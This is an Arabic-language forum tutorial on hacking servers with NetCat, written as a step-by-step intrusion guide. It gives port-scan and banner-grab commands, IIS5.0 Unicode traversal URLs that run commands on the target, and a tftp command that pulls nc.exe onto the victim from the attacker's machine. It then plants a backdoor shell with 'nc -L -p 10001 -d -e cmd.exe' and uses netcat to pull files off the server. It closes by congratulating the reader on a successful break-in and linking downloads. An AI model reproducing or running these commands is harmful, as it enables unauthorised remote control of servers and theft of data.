اختراق السيرفرات عن طريق النت كات (NetCat)

السلام عليكم ...

اليوم رح نحجي عن موضوع خطير جدا اداة النت كات net cat والاختراق بواسطتها .
البرنامج اداه من ادوات الدوس , هي فالحقيقه موجوده فاليونكس , لكن يمكن انزلها للويندوز والتعامل معها .
النت كات عباره عن اداه قابلة للكتباه والقرائه عبر اتصالات الشبكات TCP و UDP .
ولها استخدامات كثيره جدا و خطيره , مثلا بورت سكان , التنصت على البورتات , والعمل باك دور .

وراح نتكلم عن طريقت الاختراق بواسطة النت كات , والخطوات الي يجب ان نقوم بها :

-اولا البورت سكان :

تكدر تسوي سكان على البورتات عن طريق هذا الامر : nc –v –z 192.168.1.90 1-200
او الامر هذا : nc –v –w2 –z 192.168.1.90 1-200


192.168.1.90 هذا هو ايبي الجهاز او الموقع الي تريد تسوي عليه بورت سكان .
طبعا علمود تطلع ايبي الموقع سو له ping ,. مثلا : ping www.xxxx.com
الامر W2 هذا لتحديد مدة الاتصال , مثلا انا اخترت ثانيتين , اذا ماصار تجاوب يروح على البورت الي بعده , اختصار للوقت .
1-200 هذي هي البورتات الي سوينا سكان بينهم , انا اخترت البورتات من 1 الى 200 .

شوفو النتئائج شو طلعت لنا , بورت المتصفح والتلنت والاف تي بي وغيرهم . ومكتوب حذالهم البورت مفتوح وله لا .

-ثانيا الاتصال بالبورتات :
مثلا عندنا موقع ونريد نطلع معلومات عنه , مثل المعلومات الي يعطينا اياها موقع www.netcraft.com
بكل بساطه , نكتب الامر هذا : nc –v –n 192.168.1.90 80



هسه طلعنا معلومات عن البورت 21 و 80 , ولطع لنا ان الموقع يشتغل على ويندوز 2000 وعلى سيرفر IIS5.0 .وبيه ميكورسوفت FTP

حلو هذي معلومات تفيدنا في تحديد الهدف للاختراق .

هسه رح نشتغل شغل جدي , ونبدي بالتطبيق العملي , ونخترق الموقع .
رح نخلي النت كات يفتحالنا باك دور بالموقع . طبعا لازم نحمل النت كات على الموقع اول شي علمود يفتح لنا الباك دور . شلون هذا اللون ؟؟
بما ان الموقع على سيرفر IIS5.0 , بنستخدم سكربتات اليونيكود الخطيره في رفعه .


مثل ما تشوفون استخدمنا السكربت http://192.168.1.90/$$$$$$s/..%255c....d.exe?/c+di r+c
لاستعراض محتويات الدرايف C , عن طريق المجلد $$$$$$s

وطلعت لنا النتائج : ********s and Settings , Inetpub , Program Files , WINNT
حلو , هسه نرفع النت كات على سيرفر IIS
بنستخدم ال tftp , هذي الاداه مشابهه للاف تي بي , اكتب في الدوس tftp , اذا تريد تعرف المزيد عنها .

شوفو الاسكربت الي حطيناه هذي المره , نفس السكربت الاولي , لكن بدل امر الاستعراض dir , حطينا امر tftp , وطبقناه , هذي هي طريقه : TFTP [-i] host [GET | PUT] source [destination]
نحن في اختراقنا هذا الي سويناه : tftp –I 192.168.1.90 get nc.exe
طبعا في اسكربتات اليونيكود بدل المسافه نكتب +
فتصير بهذا الشكل : http:///c+TFTP+-i+192.168.1.9+GET+nc.exe

في برنامج رائع اسمه TFTPD32 , يطلع لك اذا النت كات انرفع بنجاح للسيرفر
البرنامج في المرفقات مع النت كات .

موقع البرنامج : http://tftpd32.jounin.net



هسه نبدي الشغل الحلو شنو هو كل شويه حلو , بعد ما رفعنا النت كات وكل شي تمام , نريد نخلي نخلي النت كات يفتح لنا باك دور (Back Door) .
علمود نخليه يفتح لنا الباك دور لازم نخليه فالاول يتنصت على بورت فالسيرفر , مثلا اخترت البورت 10001 , بعدين بنقدر نتصل بالبورت من جهازنا بستخدام النت كات .

انزين هسه نطبق امر التنصت من السيرفر , هذا هو الامر : nc -L -p 10001 -d -e cmd.exe

نشرح شوية الاوامر هذي الي كتبناها :
Nc : يخلي الويندوز يشغل النت كات nc.exe
-L : يخبر النت كات بان لا يغلق وان ينتظر الانتصال
-p : لتحديد البورت الي بنتصنت عليه .
-d : يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله
-e : يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد الاتصال بالبورت .
طبعا نحن اخترنا الدوس cmd.exe

هسه نكتب الامر في سكربت اليونيكود , طبعن بيكون بهذا الشكل : http:///c+nc+-L+-p+10001+-d+-e+cmd.exeشوفو الصوره :

هسه توب كلوب , النت كات تنصت على البورت 10001 , وفتح لنا باك دور على الدوس cmd.exe

هسه اجه نا , علمود من جهازنا على النت كات الي على السيرفر .

هسه ما ملاحظين , بعد ما اتصلنا بالبورت المتنصتين عليه 10001 ,
بالامر nc –v –n 192.168.1.90 10001

دخلنا على ملف $$$$$$s الي فالسيرفر , وطبقنا الامر ipconfig , والنتيجه انه طلع لنا ايبي السيرفر (^_^)
هسه صار عندنا تحكم بعيد على السيرفر .

ننقل الملفات بواسطة النت كات , كيف ؟؟
نقدر عن طريق ال TFTP , لكن لازم نسويها مره ثانيه عن طريق اليونيكود , لكن ليش خلص عاملنا هسه النت كات وهو افضل وعندنا اتصال خارجي .

اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر ملف اسمه hack.txt , نسحبه , بنطبق هذا الامر : nc –l –p 1234 >hack.txt
1234 هذا هو البورت الي بنستخدمه في سحب الملف .


واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟
عن طريق هذا الامر : nc 192.168.1.90 1234 <hack.txt , ^C


, نستعرض محتوايات المجلد بالامر dir , ونتاكد ان كل شي تمام وان الملف انرفع .
نشغل الملف في السيرفر , نستخدم الامر ! , hack.txt!


((تحميل النت كات من المرفقات))
بستعرض بعض اهم اوامر النت كات :

-e specifies a program to exec after
making/receiving a connection
-g gateway source-routing hop point[s], up to 8
-G num source-routing oiter: 4, 8, 12
-i secs delay interval for lines sent, ports scanned
-l listen mode for inbound connections
-n only accept numeric IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize
-s addr local source address
-t netcat will respond to telnet option negotiation
"this allows it to connect to a telnetd and
get past initial negotiation far enough to get
a login prompt from the server"
-u UDP connection mode
-v verbose mode
-w secs wait - timeout for connects
-z zero I/O mode [used for scanning]

For NT netcat, all of the above options exist, plus a few others.

-d detach - don't open a new DOS window
-L keep listening after the current session terminates

مبروك عليك الاختراق , والعمليه تمت بنجاح ...
وشغلة الكوبي بيست حاول تبطلوها واذا اخذت
ولاحد يكول ما افتهمت تره اركع راسي بالحايط ... ان شاء الله كلشي واضح

او نسينا

برنامج ال نت كت Nc
www.fnrtop.biz/netcat.zip



وبرنامج tftpd


http://www.5o5a.com/upload//download.php?filename= 0d17a5781e.rar حمله منا